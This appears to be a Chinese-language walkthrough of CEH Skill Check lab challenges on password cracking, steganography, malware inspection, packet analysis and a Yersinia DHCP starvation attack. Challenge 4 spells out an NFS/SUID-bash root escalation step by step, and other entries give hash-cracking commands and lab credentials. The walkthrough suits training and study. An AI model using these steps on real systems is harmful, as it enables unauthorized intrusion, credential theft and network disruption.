Challenge 1:

You are assigned a task to crack the NTLM password hashes captured by the internal security team. The password hash has been stored in the Documents folder of the Parrot Security console machine. What is the password of user James? (Format: aaaaaa)

用john 爆破john ~/Documents/hashex.txt --format=NT --wordlist ~/Desktop/Wordlist/password.txt

Challenge 2:

You are assigned a task to crack the NTLM password hashes captured by the internal security team. The password hash has been stored in the Documents folder of the Parrot Security console machine. What is the password of user Jones? (Format: NNNNNNNN)

同上

Challenge 3:

You have been given a task to audit the passwords of a server present in CEHORG network. Find out the password of the user Adam and submit it. (Note: Use Administrator/ CSCPa$$ when asked for credentials). (Format: aaaaaaaaN)

這次使用win 11 的l0phtCrack –> Password Auditing Wizard –> next –> next –> A remote machine –> Host(10.10.10.25) –> Use Specifc User Credentials –> Username(Administrator),Password(CSCPa$$) –> next –> ~~~ –> finish

Challenge 4:

You have got user-level access to the machine with IP 172.16.0.11. Your task is to escalate the privileges to that of the root user on the machine and read the content in the rootflag.txt file. (Note: all the flag files are located at the root, Desktop, Documents, or Downloads folder for the respective users/machines). Note: use LinuxPass when asked for machine password. (Format: aNNaaa*a)

這題超爛沒給用戶明誰知道是啥，找遍資料後用ssh ubuntu@172.16.0.11連進去後找了一下是要用nfs 提權的意思(順帶一題這題真的沒帶腦設計直接用sudo su就變 root 了

正規解
攻擊者

showmount -e 172.16.0.11
查看共享資料夾

mkdir /tmp/nfs

sudo mount -t nfs 172.16.0.11:/home /tmp/nfs

cd /tmp/nfs

sudo cp /bin/bash ./

sudo chmod +s bash

victim

ssh ubuntu@172.16.0.11

cd /home

./bash -p 
bash -p 保持 SUID 提權。

cat /rootflag.txt

Challenge 5:

An employee in your organization is suspected of sending important information to an accomplice outside the organization. The incident response team has intercepted some files from the employee's system that they believe have hidden information. You are asked to investigate a file named Confidential.txt and extract hidden information. Find out the information hidden in the file. Note: The Confidential.txt file is located at C:\Users\Admin\Documents in EH Workstation – 2 machine. (Format: Aaaaa/AaaaaaaNNNNN)

這題很明顯就是被snow用過

Challenge 6:

The incident response team has intercepted an image file from a communication that is supposed to have just text. You are asked to investigate the file and check if it contains any hidden information. Find out the information hidden in the file. Note: The vacation.bmp file is located at C:\Users\Admin\Documents in EH Workstation – 2 machine. (Format: AAANNNNNNN)

用OpenStego

Challenge 7:

A disgruntled employee in CEHORG has used the Covert_TCP utility to share a secret message with another user in the CEHORG network. Covert_TCP manipulates the TCP/IP header of the data packets to send a file one byte at a time from any host to a destination. It can be used to hide the data inside IP header fields. The employee used the IP ID field to hide the message. The network capture file “Capture.pcapng” has been retained in the “C:\Users\Administrator\Documents” directory of the “EH Workstation – 2” machine. Analyze the session to get the message that was transmitted. (Format: ANAAN)

題目有提到Convert_tcp，wireshark –> Statistics –> Conversations –> TCP 16 –> 選擇8888 9999 port 右鍵 –> Apply as Filter –> A -> B，之後就觀察下面文字變化

Challenge 8:

You are a malware analyst working for CEHORG. During your assessment within your organisation's network, you found a malware face.exe. The malware is extracted and placed at C:\Users\Admin\Documents in the EH Workstation – 2 machine. Analyze the malware and find out the File pos for KERNEL32.dll text. (Hint: exclude zeros.) (Format: AANN)

這裡用BinText打開看尋找KERNELL32.dll即可

Challenge 9:

Analyze an ELF executable (Sample-ELF) file placed at C:\Users\Admin\Documents in the EH Workstation – 2 machines to determine the CPU Architecture it was built for. (Format: AAAAANN)

是ELF所以直接用linux 比較快，用SMB連線把那個檔案抓過來用file即可得到答案

Challenge 10:

CEHORG has assigned you with analysing the snapshot of the operating system registry and perform the further steps as part of dynamic analysis and find out the whether the driver packages registry is changed. Give your response as Yes/No. (Format: Aaa)

Challenge 11:

Perform windows service monitoring and find out the service type associated with display name "afunix". (Format: aaaaaa)

這題是問chat gpt的(對windows 真的不熟，(Get-Service -Name "afunix").ServiceType

Challenge 12:

Use Yersinia on the “EH Workstation – 1” (Parrot Security) machine to perform the DHCP starvation attack. Analyze the network traffic generated during the attack and find the Transaction ID of the DHCP Discover packets. (Format: NaNNNaNNNN)

這裡用yersinia 模擬一次DHCP starvation

sudo tcpdump -i eth0 -v 

yersinai -G

Launch attack --> DHCP --> sending DISCOVER packet --> OK

Challenge 13:

CEHORG suspects a possible sniffing attack on a machine in its network. The organization has retained the network traffic data for the session and stored it in the Documents folder in EH Workstation – 2 (Windows 11) machine as sniffsession.pcap. You have been assigned a task to analyze and find out the protocol used for sniffing on its network. (Format: AAA)

大致看一下封包，ARP的行為最奇怪，列出來看，有奇怪的來源ip、奇怪的請求

Challenge 14:

As an ethical hacker, you are tasked to analyze the traffic capture file webtraffic.pcapng. Find out the packet's id that uses ICMP protocol to communicate. Note: The webtraffic.pcapng file is located at C:\Users\Administrator\Documents\ in the Documents folder on EH Workstation – 2 (Windows 11) machine. (Format: NaaaNN)

filter下icmp 在info段就有id 了

Challenge 15:

CEHORG has found that one of its web application movies.cehorg.com running on its network is leaking credentials in plain text. You have been assigned a task of analysing the movies.pcap file and find out the leaked credentials. Note: The movies.pcapng file is located at C:\Users\Administrator\Documents\ in the Documents folder on EH Workstation – 2 (Windows 11) machine. Make a note of the credentials obtained in this flag, it will be used in the Part 4 of CEH Skill Check. (Format: Aaaaa/aaaaaaa)

filter下http.request.method==POST，因為要找網站登入的帳密

Challenge 16:

An attacker has created a custom UDP packet and sent it to one of the machines in the CEHORG. You have been given a task to study the ""CustomUDP.pcapng"" file and find the data size of the UDP packet (in bytes). Note: The CustomUDP.pcapng file is located at C:\Users\Administrator\Documents\ in the Documents folder on EH Workstation – 2 (Windows 11) machine. (Format: NNN)

filiter下udp 即可看到Data (600 bytes)

Challenge 17:

A denial-of-service attack has been launched on a target machine in the CEHORG network. A network session file "DoS.pcapng" has been captured and stored in the Documents folder of the EH Workstation - 2 machine. Find the IP address of the attacker's machine. (Format: NNN.NNN.N.NN)

查看Conversations很明顯192.168.0.51各個port 都去打10.10.1.11 80 port

Challenge 18:

CEHORG hosts a datacenter for its bussiness clients. While analyzing the network traffic it was observed that there was a huge surge of incoming traffic from multiple sources. You are given a task to analyze and study the DDoS.pcap file. The captured network session (DDoS.pcapng) is stored in the Documents folder of the EH Workstation -2 machine. Determine the number of machines that were used to initiate the attack. (Format: N)

一樣Converstations 打開，發現DDOS只有3台